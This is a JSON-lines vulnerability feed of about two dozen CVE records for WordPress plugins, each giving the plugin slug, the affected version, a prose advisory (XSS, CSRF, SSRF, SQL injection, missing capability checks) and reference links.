{"CVE_ID":"CVE-2024-13857","slug":"wpgetapi","versionImpact":"2.2.10","description":"The WPGet API \u2013 Connect to any external REST API plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.2.10. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3251647\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3251647\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpgetapi\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpgetapi\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd2a8e7b-6fca-49f3-ba6d-bdaa418f611a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd2a8e7b-6fca-49f3-ba6d-bdaa418f611a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3749","slug":"wt-display-breeze","versionImpact":"1.2.3","description":"The Breeze Display plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018cal_size\u2019 parameter in all versions up to, and including, 1.2.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wt-display-breeze\\\/trunk\\\/includes\\\/shortcodes.php#L114\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wt-display-breeze\\\/trunk\\\/includes\\\/shortcodes.php#L114\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3280146\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3280146\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wt-display-breeze\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wt-display-breeze\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/527dd2c7-5bbb-4c79-aa3c-7d70ddd26163?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/527dd2c7-5bbb-4c79-aa3c-7d70ddd26163?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4551","slug":"rich-table-of-content","versionImpact":"1.3.7","description":"The Rich Table of Contents WordPress plugin through 1.3.7 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91c00b17-00ba-4c3f-8587-d54449a02659\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91c00b17-00ba-4c3f-8587-d54449a02659\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1912","slug":"limit-login-attempts","versionImpact":"1.7.1","description":"The Limit Login Attempts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via its lock logging feature in versions up to, and including, 1.7.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrator accesses the plugin's settings page. This only works when the plugin prioritizes use of the X-FORWARDED-FOR header, which can be configured in its settings.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=551920%40limit-login-attempts%2Ftags%2F1.7.1&new=2893850%40limit-login-attempts%2Ftags%2F1.7.2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=551920%40limit-login-attempts%2Ftags%2F1.7.1&new=2893850%40limit-login-attempts%2Ftags%2F1.7.2\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb8c80fc-3b51-4003-b221-6f02e74bead0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb8c80fc-3b51-4003-b221-6f02e74bead0?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2300","slug":"contact-form-with-a-meeting-scheduler-by-vcita","versionImpact":"4.9.1","description":"The Contact Form Builder by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'email' parameter in versions up to, and including, 4.9.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with the edit_posts capability, such as contributors and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12ce97ba-8053-481f-bcd7-05d5e8292adb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12ce97ba-8053-481f-bcd7-05d5e8292adb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-with-a-meeting-scheduler-by-vcita\\\/trunk\\\/system\\\/parse_vcita_callback.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-with-a-meeting-scheduler-by-vcita\\\/trunk\\\/system\\\/parse_vcita_callback.php#L55\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"name\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4276","slug":"absolute-privacy","versionImpact":"2.1","description":"The Absolute Privacy plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.1. This is due to missing nonce validation on the 'abpr_profileShortcode' function. This makes it possible for unauthenticated attackers to change user email and password via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/absolute-privacy\\\/trunk\\\/profile_page.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/absolute-privacy\\\/trunk\\\/profile_page.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3855e84-b97e-4729-8a48-55f2a2444e2c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3855e84-b97e-4729-8a48-55f2a2444e2c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0869","slug":"instant-images","versionImpact":"6.1.0","description":"The Instant Images \u2013 One Click Image Uploads from Unsplash, Openverse, Pixabay and Pexels plugin for WordPress is vulnerable to unauthorized arbitrary options update due to an insufficient check that neglects to verify whether the updated option belongs to the plugin on the instant-images\/license REST API endpoint in all versions up to, and including, 6.1.0. This makes it possible for authors and higher to update arbitrary options.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17941fbb-c5da-4f5c-a617-3792eb4ef395?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17941fbb-c5da-4f5c-a617-3792eb4ef395?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instant-images\\\/tags\\\/6.1.0\\\/api\\\/license.php#L91\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instant-images\\\/tags\\\/6.1.0\\\/api\\\/license.php#L91\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/instant-images\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/instant-images\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3027110\\\/instant-images\\\/tags\\\/6.1.1\\\/api\\\/license.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3027110\\\/instant-images\\\/tags\\\/6.1.1\\\/api\\\/license.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0516","slug":"royal-elementor-addons","versionImpact":"1.3.87","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to unauthorized post metadata update due to a missing capability check on the wpr_update_form_action_meta function in all versions up to, and including, 1.3.87. This makes it possible for unauthenticated attackers to update certain metadata.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3457b87-c860-4cf2-ac3d-2c6521b629ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3457b87-c860-4cf2-ac3d-2c6521b629ea?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2795","slug":"seo-simple-pack","versionImpact":"3.2.1","description":"The SEO SIMPLE PACK plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 3.2.1 via META description. This makes it possible for unauthenticated attackers to extract limited information about password protected posts.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f62a9ca0-7077-410f-b005-175348acd133?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f62a9ca0-7077-410f-b005-175348acd133?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/seo-simple-pack\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/seo-simple-pack\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10148","slug":"wp-awesome-buttons","versionImpact":"1.0","description":"The Awesome buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's btn2 shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84ef25b6-8119-41e5-9959-ccdfb9893e75?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84ef25b6-8119-41e5-9959-ccdfb9893e75?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-awesome-buttons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-awesome-buttons\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10017","slug":"pjw-mime-config","versionImpact":"1.0","description":"The PJW Mime Config plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2731e8ed-27db-4d2b-b76f-8fdccfb2226a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2731e8ed-27db-4d2b-b76f-8fdccfb2226a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pjw-mime-config\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pjw-mime-config\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-54274","slug":"octrace-support","versionImpact":"1.2.7","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Octrace Studio WordPress HelpDesk & Support Ticket System Plugin \u2013 Octrace Support allows Reflected XSS.This issue affects WordPress HelpDesk & Support Ticket System Plugin \u2013 Octrace Support: from n\/a through 1.2.7.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/octrace-support\\\/vulnerability\\\/wordpress-octrace-support-plugin-1-2-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/octrace-support\\\/vulnerability\\\/wordpress-octrace-support-plugin-1-2-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11363","slug":"same-but-different","versionImpact":"1.0.16","description":"The Same but Different \u2013 Related Posts by Taxonomy plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.0.16. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/same-but-different\\\/tags\\\/1.0.15\\\/library\\\/template-parts\\\/tabs.php#L27\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/same-but-different\\\/tags\\\/1.0.15\\\/library\\\/template-parts\\\/tabs.php#L27\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d262a3b-6205-45b3-8d8e-da541e07de46?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d262a3b-6205-45b3-8d8e-da541e07de46?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12385","slug":"wp-abstracts-manuscripts-manager","versionImpact":"2.7.2","description":"The WP Abstracts plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.7.2. This is due to missing nonce validation on the wpabstracts_load_status() and wpabstracts_delete_abstracts() functions. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-abstracts-manuscripts-manager\\\/trunk\\\/abstracts\\\/abstracts.manage.php#L148\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-abstracts-manuscripts-manager\\\/trunk\\\/abstracts\\\/abstracts.manage.php#L148\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-abstracts-manuscripts-manager\\\/trunk\\\/abstracts\\\/abstracts.manage.php#L205\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-abstracts-manuscripts-manager\\\/trunk\\\/abstracts\\\/abstracts.manage.php#L205\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3223874\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3223874\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-abstracts-manuscripts-manager\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-abstracts-manuscripts-manager\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79af711e-d044-447e-9802-8be648a3843d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79af711e-d044-447e-9802-8be648a3843d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12768","slug":"responsive-iframe","versionImpact":"1.2.0","description":"The Responsive iframe WordPress plugin through 1.2.0 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fe2e47f4-b89e-4c22-8d27-672da0fb99af\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fe2e47f4-b89e-4c22-8d27-672da0fb99af\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13468","slug":"trash-duplicate-and-301-redirect","versionImpact":"1.9","description":"The Trash Duplicate and 301 Redirect plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'duplicates-action-top' action in all versions up to, and including, 1.9. This makes it possible for unauthenticated attackers to delete arbitrary posts\/pages.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/trash-duplicate-and-301-redirect\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/trash-duplicate-and-301-redirect\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebb6afd7-6bc4-4c8a-a645-04f64d5adff4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebb6afd7-6bc4-4c8a-a645-04f64d5adff4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6718","slug":"pvn-auth-popup","versionImpact":"1.0.0","description":"The PVN Auth Popup WordPress plugin through 1.0.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7d28ea72-8c3b-4607-b877-7b10d954fef9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7d28ea72-8c3b-4607-b877-7b10d954fef9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4546","slug":"mapwiz","versionImpact":"1.0.1","description":"The Mapwiz WordPress plugin through 1.0.1 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/009578b9-016d-49c2-9577-49756c35e1e8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/009578b9-016d-49c2-9577-49756c35e1e8\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/bulletin.iese.de\\\/post\\\/mapwiz_1-0-1\\\/\",\"name\":\"https:\\\/\\\/bulletin.iese.de\\\/post\\\/mapwiz_1-0-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1931","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to unauthorized data loss due to a missing capability check on the deleteCssAndJsCacheToolbar function in versions up to, and including, 1.1.2. This makes it possible for authenticated attackers with subscriber-level access to perform cache deletion.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4bb2d72-ff31-4220-acb3-ed17bb9229b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4bb2d72-ff31-4220-acb3-ed17bb9229b5?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2299","slug":"meeting-scheduler-by-vcita","versionImpact":"4.3.1","description":"The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to unauthorized medication of data via the \/wp-json\/vcita-wordpress\/v1\/actions\/auth REST-API endpoint in versions up to, and including, 4.2.10 due to a missing capability check on the processAction function. This makes it possible for unauthenticated attackers modify the plugin's settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4855627a-de56-49ee-b0b0-01b9735d8557?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4855627a-de56-49ee-b0b0-01b9735d8557?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"name\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meeting-scheduler-by-vcita\\\/trunk\\\/vcita-api-functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meeting-scheduler-by-vcita\\\/trunk\\\/vcita-api-functions.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3197","slug":"mstore-api","versionImpact":"4.0.1","description":"The MStore API plugin for WordPress is vulnerable to Unauthenticated Blind SQL Injection via the 'id' parameter in versions up to, and including, 4.0.1 due to insufficient escaping on the user supplied parameters and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30aab1af-a78f-4bac-b3c5-30ea854ccef7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30aab1af-a78f-4bac-b3c5-30ea854ccef7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2929891\\\/mstore-api\\\/trunk\\\/controllers\\\/helpers\\\/vendor-wcfm.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2929891\\\/mstore-api\\\/trunk\\\/controllers\\\/helpers\\\/vendor-wcfm.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4283","slug":"embedpress","versionImpact":"3.8.2","description":"The EmbedPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'embedpress_calendar' shortcode in versions up to, and including, 3.8.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2950211\\\/embedpress#file18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2950211\\\/embedpress#file18\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b340eda1-e9d2-40b6-89f9-41d995ce3555?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b340eda1-e9d2-40b6-89f9-41d995ce3555?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.8.2\\\/EmbedPress\\\/ThirdParty\\\/Googlecalendar\\\/Embedpress_Google_Helper.php#L522\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.8.2\\\/EmbedPress\\\/ThirdParty\\\/Googlecalendar\\\/Embedpress_Google_Helper.php#L522\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6532","slug":"wp-blogs-planetarium","versionImpact":"1.0","description":"The WP Blogs' Planetarium WordPress plugin through 1.0 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/05a730bc-2d72-49e3-a608-e4390b19e97f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/05a730bc-2d72-49e3-a608-e4390b19e97f\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-6532.txt\",\"name\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-6532.txt\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0515","slug":"royal-elementor-addons","versionImpact":"1.3.87","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.87. This is due to missing or incorrect nonce validation on the remove_from_compare function. This makes it possible for unauthenticated attackers to remove items from user compare lists via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4178271-c09e-4094-a616-5a00d28f39a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4178271-c09e-4094-a616-5a00d28f39a3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5730","slug":"pagerank-tools","versionImpact":"1.1.5","description":"The Pagerank tools WordPress plugin through 1.1.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17482b2c-c9ba-480a-8000-879baf835af7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17482b2c-c9ba-480a-8000-879baf835af7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
